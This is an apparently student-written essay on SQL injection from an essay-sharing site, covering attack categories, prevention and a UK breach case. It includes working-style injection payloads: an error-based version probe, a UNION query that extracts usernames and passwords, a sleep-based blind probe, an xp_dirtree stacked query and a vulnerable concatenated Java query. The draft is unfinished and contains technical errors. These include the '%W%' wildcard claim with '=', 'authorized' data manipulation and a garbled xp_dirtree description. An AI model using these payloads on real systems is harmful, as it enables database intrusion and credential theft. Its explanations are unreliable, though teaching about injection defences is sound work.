Search for an essay or resource:

Essay: SQL Injection

Essay details:

  • Subject area(s): Computer science essays
  • Reading time: 9 minutes
  • Price: Free download
  • Published: December 26, 2019*
  • File format: Text
  • Number of pages: 2
  • SQL Injection
    0.0 rating based on 12,345 ratings
    Overall rating: 0 out of 5 based on 0 reviews.

Text preview of this essay:

This page of the essay has 2717 words. Download the full version above.

Abstract

This paper investigates Structured Query Language (SQL) Injection from a web security stand point. SQL Injection consists of attackers injecting malicious SQL commands into an application to alter how it interacts with the database. This consists of any statement that creates, reads, updates or deletes data from a database.

SQL injection is dangerous because attackers are using it to reveal confidential and proprietary data, delete or otherwise harm important data, steal data for monetary and other gain, or even deny service all the way up to a full system compromise.

Since awareness is the first line of defense, this paper will describe each type of SQL injection attack and how it makes a web application vulnerable, what things an attacker might do to exploit this vulnerability, and the measures that can be taken to prevent and contain it. All SQL injections cannot be stopped, but penetration of the system can be minimized if development proceeds with these vulnerabilities in mind.

Real world examples of SQL injection will also be highlighted, showing the full impact of these attacks and how their issues could have been avoided had some of these measures been taken. Knowing the real-life examples that hackers have used will illustrate the importance of protecting from SQL injection.

SQL Injection Attacks

“A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.” (OWASP, 2016).

Most Web forms have no mechanisms in place to block input other than names and passwords. Unless precautions are taken, an attacker can use the input boxes to send their own request to the database, which could allow them to download the entire database or interact with it in other illicit ways.

SQL injection attacks continued to be heavily utilized by attackers as a part of the significant rise of web application attacks. This attack vector increased 62% since last year, and 19% since last quarter. The significant increase in web application attacks, particularly “injection” attacks like SQLi, should come as no surprise as the latest version of the OWASP Top 10 2017 that came out last week has “injection” (inclusive of SQLi) as the top ranked vulnerability category. This new iteration is the first major update to the OWASP Top 10 since 2013, when “injection” also resided in the top spot (Cilliers, 2017).

Automated SQL injection programs are now available, not only making it easier for an attacker to carry out his attack but increasing the scope of the attack. In the past, attackers needed to type SQL into web applications manually to accomplish this.

Different Types of SQL Injection

All SQL Injection (SQLi) attacks can be classified into two major categories. These categories are Data Selection and Data Manipulation. Data Selection is the method of injecting SQL to retrieve data that is not authorized by the web application. Data Manipulation is using SQL injection to alter data in the database in an authorized fashion.

Under those categories the attacks can be broken into three sub categories by method of attack. These sub categories are in-band SQLi, Inferential SQLi, and out-of-band SQLi. Each of these can be broken down further and will be in the subsequent pages of this report.

In-band SQLi

In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results (Muscat, 2015). This is also referred to as Classic SQLi. There are generally two types of in-band SQLi: Error-based SQLi and Union-based SQLi.

Error-based SQLi

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database (Muscat, 2015). This attack allows the attacker to continue to send injected SQL and by the way the interpreter responds they can, by trial and error, figure out the entire structure of the database.

A perfect example of Error-Based SQLi is adding on to the URL of a webpage that exposes data in the URL. For instance, imagine a web application that sells book; URL = www.notamazon.com. One goes to this web site to buy books. When one goes to the URL and selects the title of a book from the page the URL that shows the page is www.notamazon.com?id=34.

It can be surmised that id is used to identify the book selected. Inject some SQL to the end of the URL and resubmit the page. From the error returned the attacker can retrieve the database version. The URL will be “www.notamazon.com?id=34 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or i–” . It will the following: “Duplicate entry ‘4.3.45-log:1’ for key ‘group_key’”. As one can see it used the error message to get the version of the database. (NEED EXAMPLE)

This can be repeated over and over getting different error message to report the layout of the database. The next step would be to get the database name, then the table names, and finally the number of columns in a certain table. From this information the data can start to be extracted from the database. It can also be used to modify data in the database.

Union-based SQLi

Union-based injection uses the union SQL operator to combine the results of two or more SQL SELECT statements in a single result. For example, to extract data from another table on the same data one can use the UNION SQL command to retrieve the data. The following example illustrates how this is done: www.notamazon.com?id=34 AND 1=2 UNION SELECT username,password, 1 from members. Assuming there database has a members table, this SQL statement will return all the usernames and passwords from the members table. Notice the false statement that is added to the where clause of the original query before the union operator. This is a common practice when extracting data to insure that the results are only from injected SQL (“SQL Injection Using UNION,” 2018).

Inferential SQLi (Blind SQLi)

Inferential SQLi (Blind SQLi) injection takes longer for the attacker to exploit but is just as dangerous as in-band SQLi. In this attack no data is transferred via the web application and the attacker does not see the results. Instead, an attacker is able to reconstruct the data base structure by sending payloads and observing the web applications response and the resulting behavior of the database server (Muscat, 2015). The two types of Inferential SQL injection are Boolean-based blind SQLi and Time-based SQLi.

Boolean-based Blind SQLi

Boolean based (content-based) Blind SQLi is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result (Muscat, 2015).

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned (Muscat, 2015).

An example of this is :http://www.notamazon.com?id=34 and (select count (id) from members). I am asking if there is a table named members in the database. If data is returned then the statement was TRUE and the table exists. Using this method one can guess the names in the column when a result is returned, meaning TRUE, one knows their column name was correct. Once the table names and columns are known one can start to figure out the content by probing each character in each column until values are discovered. (need new example)

Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE (Muscat, 2015).

Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned (Muscat, 2015).

An example of Time-base SQLi is : SELECT * FROM products WHERE id = 34 AND if(1=1, sleep(10), false). If there is a 10 second delay the web application is vulnerable. With additional queries and bruteforce the contents of the database can be derived (example)

Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results (Muscat, 2015).

Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable) (Muscat, 2015).

An example of Out-of-Band SQLI is SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree. This relies on the ability to run EXEC command from URL which is a setting on the database. If this is allowed the above SQL statement will be resolved to two sql statements and the second SQl statement will return a list of folders for the folder named xp. (example)

Prevention

Ed – throw some introductory paragraph here

Input type checking is the practice of ensuring that the user data in a web Application is filtered for context. For example, email addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on. A good way to perform this task is using the regular expression (Halfond, 6).

Blacklist validation and Whitelist validation are other ways to prevent SQLi. Blacklist validation refers to rejecting data based on a known bad list filter. Whitelist validation refers to data validation techniques such as checking the data type, data length, input range, nature of data by its format. Regular expressions may be used for format validation in inputs. (kurinchilamp, 2012)

A regular expression uses a sequence of characters that define a search pattern. It will search a string for the pattern and report whether it found the expression or not. The following is an example of a regular expression being used to validate that a string is a valid email address in Java, if returns true if the string is a valid email address and false if not.

public static boolean isValidEmailAddress(String emailAddress){

if (emailAddress == null) {

return false;

}

String expression=”[a-z0-9!#$%&’*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&’*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?”;

CharSequence inputStr = emailAddress;

Pattern pattern = Pattern.compile(expression,Pattern.CASE_INSENSITIVE);

Matcher matcher = pattern.matcher(inputStr);

return matcher.matches();

}

Use a web application firewall. A firewall employs a set of rules to filter potentially dangerous web requests. Its SQL injection defenses can catch most attempts to sneak SQL through user input.

Employ the principles of least privilege by creating multiple database user accounts with the minimum levels of privilege for their usage environment. Limit user access so a breach of one system will not create a breach that can be leveraged to compromise the entire database.

Do not construct SQL queries with user input. Even data sanitization routines can be flawed. Parameterize all SQL using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries. In Java it is possible to construct SQl statements by concatenating a string and sending it to the database. Here is an example:

String query = “SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = “’” + username + “’”;

This is then sent to the database and executed. It returns the username and password from the users table. If username is a direct input from a web for it will execute it. If an attacker uses SQLi on the web form they could put in ‘%W%’ for the user name and it would construct the following query string :

SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = ‘%W%’;

This will return every username and password that has a ‘W’ in it. However if the SQL string was parametrized as follows the username and passwords would not be returned and an error thrown:

String query = “SELECT USERNAME,PASSWORD FROM database.USERS WHERE USERNAME = ? “;

Eliminate unnecessary database capabilities that allow users to escalate database privileges and those that spawn command shells. Regularly apply software patches. Because SQL injection vulnerabilities are regularly identified in commercial software, it is important to stay up to date on patching.

Suppress error messages to give minimal information. Error messages are an important reconnaissance tool for attackers. Make all error messages as generic as possible to give minimal information about the web application and databases it employs. An example of this would be if you have a web form with multiple fields and every field is error checked. Do not return a different error message based on the field that is invalid. This will allow an attacker to identify which fields are wrong and by trial and error figure out correct fields.

Make sure that error logs are not easily available to an attacker.

Monitor SQL statements from database-connected applications continuously. This will help identify rogue SQL statements and vulnerabilities. Monitoring tools that utilize machine learning and/or behavioral analysis can be especially useful.

Anatomy of a SQL Injection Breach

In May 2017, online building products supplier Construction Materials Online were fined £55,000 by the Information Commissioner’s Office (ICO), an amount equal to 5% of their net worth, for failing to have the appropriate technical measures in place to prevent an attack on cardholder details of its customers. Three years earlier, an attacker used SQL injection to access 669 unencrypted cardholder details, including names, addresses, account numbers and even security codes. ICO also found that the supplier had failed to carry out regular penetration testing on its ecommerce website, failed to ensure that system passwords were sufficiently complex to resist brute-force attacks, and failed to keep patches up to date. (Shah, 2017)

Conclusion

Implementing any of these defenses reduces the chances of a successful SQL injection attack. Implementing all of them will provide a high degree of SQL injection prevention. Despite its widespread use web applications do not have to be victims of SQL injection attacks.

When a web application is being developed SQLi precautions should be used through the entire life cycle of development. Defenses need to be integrated while the application is being developed rather than an afterthought. The defenses against SQLi will be throughout the application and not be put in key places trying to intercept rouge SQL statements.

References

OWASP. (2016, April 10). SQL Injection. Retrieved February 16, 2018, from https://www.owasp.org/index.php/SQL_Injection

Quora. (n.d.). How many types of SQL injections are there? Retrieved February 16, 2018,

from https://www.quora.com/How-many-types-of-SQL-injections-are-there

SQL Injection Using UNION. (2018). Retrieved March 12, 2018, from http://www.sqlinjection.net/union/

Cilliers, H. (2017, December 06). Report: Web application attacks continued to rise in 2017. Retrieved April 16, 2018, from https://accountingweekly.com/report-web-application-attacks-continued-rise-2017/

Muscat, Ian (2015). Retrieved from https://www.acunetix.com/blog/articles/sqli-part-4-in-band-sqli-classic-sqli/

William G.J. Halfond, Jeremy Viegas, and Alessandro Orso College of Computing Georgia Institute of Technology A Classification of SQL Injection Attacks and Countermeasures {whalfond|jeremyv|orso}@cc.gatech.eduhttps://www.cc.gatech.edu/fac/Alex.Orso/papers/halfond.viegas.orso.ISSSE06.pdf

Sailing Safe in Cyberspace: Protect Your Identity and Data

By Anjali Kaushik 2013

.

Kurinchilamp (2012, September 9)SQL Injection: Whitelist validation vs. blacklist validation. Retrieved from http://kurinchilamp.kurinchilion.com/2012/09/sql-injection-whitelist-validation-vs-blacklist-validation.html

About Essay Sauce

Essay Sauce is the free student essay website for college and university students. We've got thousands of real essay examples for you to use as inspiration for your own work, all free to access and download.

...(download the rest of the essay above)

About this essay:

If you use part of this page in your own work, you need to provide a citation, as follows:

Essay Sauce, SQL Injection. Available from:<https://www.essaysauce.com/computer-science-essays/sql-injection/> [Accessed 18-05-21].

These Computer science essays have been submitted to us by students in order to help you with your studies.

* This essay may have been previously published on Essay.uk.com at an earlier date.

Review this essay:

Please note that the above text is only a preview of this essay.

Name
Email
Rating
Review Content

Latest reviews: